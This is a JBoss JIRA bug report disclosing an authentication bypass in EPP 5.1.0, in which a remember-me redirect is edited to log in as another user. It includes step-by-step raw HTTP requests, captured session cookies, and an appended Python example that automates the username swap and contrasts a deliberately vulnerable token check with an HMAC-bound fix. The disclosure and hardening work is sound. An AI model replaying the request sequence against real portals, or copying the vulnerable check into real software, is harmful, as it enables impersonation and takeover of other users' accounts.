[jboss-jira] [JBoss JIRA] (JBPORTAL-2496) bypass authentication

Wells guo (JIRA) jira-events at lists.jboss.org
Mon Dec 9 01:42:06 EST 2013


Wells guo created JBPORTAL-2496:
-----------------------------------

             Summary:  bypass authentication
                 Key: JBPORTAL-2496
                 URL: https://issues.jboss.org/browse/JBPORTAL-2496
             Project: JBoss Portal
          Issue Type: Bug
      Security Level: Public (Everyone can see)
         Environment: EPP 5.1.0
            Reporter: Wells guo


Steps to Reproduce:

1. Log into our portal project with correct username and password

POST /portal/login HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXX/home?portal:componentId=UIPortal&portal:action=Logout
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

initialURI=%2Fportal%2Fprivate%2Fxxxx0%2Fhome&username=userA&password=xxxx

2. Get a 302 response and open the /portal/private/project/home page

HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:19:48 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Location: http://XXXX//home
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

GET /portal/private/xxxx/home HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXX//home?portal:componentId=UIPortal&portal:action=Logout
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive

3. Get a 302 response again, which redirects to the security check page with the username; modify the username to someone else who is logged in.

Original message:

HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:29:42 GMT
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userA&j_password=rememberme1447024746
                                                            ^^^^^^^^^^^^^^^^
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

Modified message:

HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:29:42 GMT
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userB&j_password=rememberme1447024746
                                                            ^^^^^^^^^^^^^^^^
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

4. Send a GET request for the page in the "Location" of step 3, which has username "userB"

GET /portal/private/xxx/j_security_check?j_username=userB&j_password=rememberme1447024746 HTTP/1.1
                                         ^^^^^^^^^^^^^^^^
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXX/portal/private/xxxx/home?portal:componentId=UIPortal&portal:action=Logout
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive

5. Get a 302 response and a redirect to the home page (attachment1).

6. Click the content tab on the home page; it will now display a login as "userB", and operations can be performed as userB too.


Actual results:

Successfully bypassed authentication.


Expected results:

Should not log into the project as "userB" successfully.

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
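The following is an added worked example, not code from the JIRA report, from EPP or from JBoss Portal. It rewrites the step 3 Location header the way the reporter did, then models the server side of the report in two forms: a remember-me check that accepts a valid token for whatever j_username the client supplies, which is the behaviour steps 4 to 6 demonstrate, and a hardened check that binds the token to the user it was issued for with an HMAC and rejects any other j_username. The token layout, the in-memory token store, the HMAC key and the class and function names are assumptions made for illustration; the report does not show how EPP builds or validates "rememberme1447024746".

```python
"""Added example; not code from the JIRA report, EPP or JBoss Portal.

Rewrites the step 3 Location header as the reporter did, then contrasts a
remember-me check that trusts the client-supplied j_username (the failure
the report shows) with one that binds the token to the user it was issued
for. Token format, token store and HMAC key are assumptions for illustration.
"""
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qsl, urlencode

# Location header captured in step 3 of the report (host redacted as XXXX there).
CAPTURED_LOCATION = ("http://XXXX//portal/private/xxxx/j_security_check"
                     "?j_username=userA&j_password=rememberme1447024746")


def rewrite_username(location: str, new_user: str) -> str:
    """Step 3 of the report: keep j_password, swap j_username for another user."""
    base, _, query = location.partition("?")
    params = dict(parse_qsl(query, keep_blank_values=True))
    params["j_username"] = new_user
    return base + "?" + urlencode(params)


class VulnerableRememberMe:
    """Assumed model of the failure: the token proves that *someone* chose
    remember-me, but the user it was issued for is not recorded, so a valid
    token plus ANY j_username yields a session for that j_username."""

    def __init__(self) -> None:
        self._expiry_by_token: dict[str, float] = {}   # user deliberately not stored

    def issue(self, username: str, ttl: int = 3600) -> str:
        token = "rememberme" + str(secrets.randbelow(10**10))
        self._expiry_by_token[token] = time.time() + ttl
        return token

    def authenticate(self, j_username: str, j_password: str):
        expiry = self._expiry_by_token.get(j_password)
        if expiry is None or expiry < time.time():
            return None
        return j_username        # BUG: the principal comes from the request, not the token


class BoundRememberMe:
    """Token = rememberme:<user>:<expiry>:<HMAC-SHA256(key, "user:expiry")>.

    The user is part of the signed payload, so j_username must match it and
    editing either field breaks the MAC. Usernames are assumed not to contain ':'."""

    def __init__(self, key: bytes) -> None:
        self._key = key

    def _mac(self, user: str, expiry: str) -> str:
        return hmac.new(self._key, f"{user}:{expiry}".encode(), hashlib.sha256).hexdigest()

    def issue(self, username: str, ttl: int = 3600) -> str:
        expiry = str(int(time.time()) + ttl)
        return f"rememberme:{username}:{expiry}:{self._mac(username, expiry)}"

    def authenticate(self, j_username: str, j_password: str):
        parts = j_password.split(":")
        if len(parts) != 4 or parts[0] != "rememberme":
            return None
        _, user, expiry, mac = parts
        if not expiry.isdigit() or int(expiry) < time.time():
            return None
        if not hmac.compare_digest(mac, self._mac(user, expiry)):
            return None          # token tampered with or forged
        if not hmac.compare_digest(user.encode(), j_username.encode()):
            return None          # valid token, but minted for a different user
        return user


if __name__ == "__main__":
    print("attacker's Location:", rewrite_username(CAPTURED_LOCATION, "userB"))

    weak = VulnerableRememberMe()
    token = weak.issue("userA")
    print("vulnerable check, userA's token sent as userB ->", weak.authenticate("userB", token))

    strong = BoundRememberMe(secrets.token_bytes(32))
    token = strong.issue("userA")
    print("bound check, userA's token sent as userA ->", strong.authenticate("userA", token))
    print("bound check, userA's token sent as userB ->", strong.authenticate("userB", token))
    print("bound check, username edited inside the token ->",
          strong.authenticate("userB", token.replace("userA", "userB")))
```

Two checks worth running against a real deployment follow from this: whether a remember-me token replayed with a different j_username yields that user's session (the report's step 4), and whether the token travels in a GET query string at all, since a query-string credential is written to access logs and is sent onward in the Referer header of the next request.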

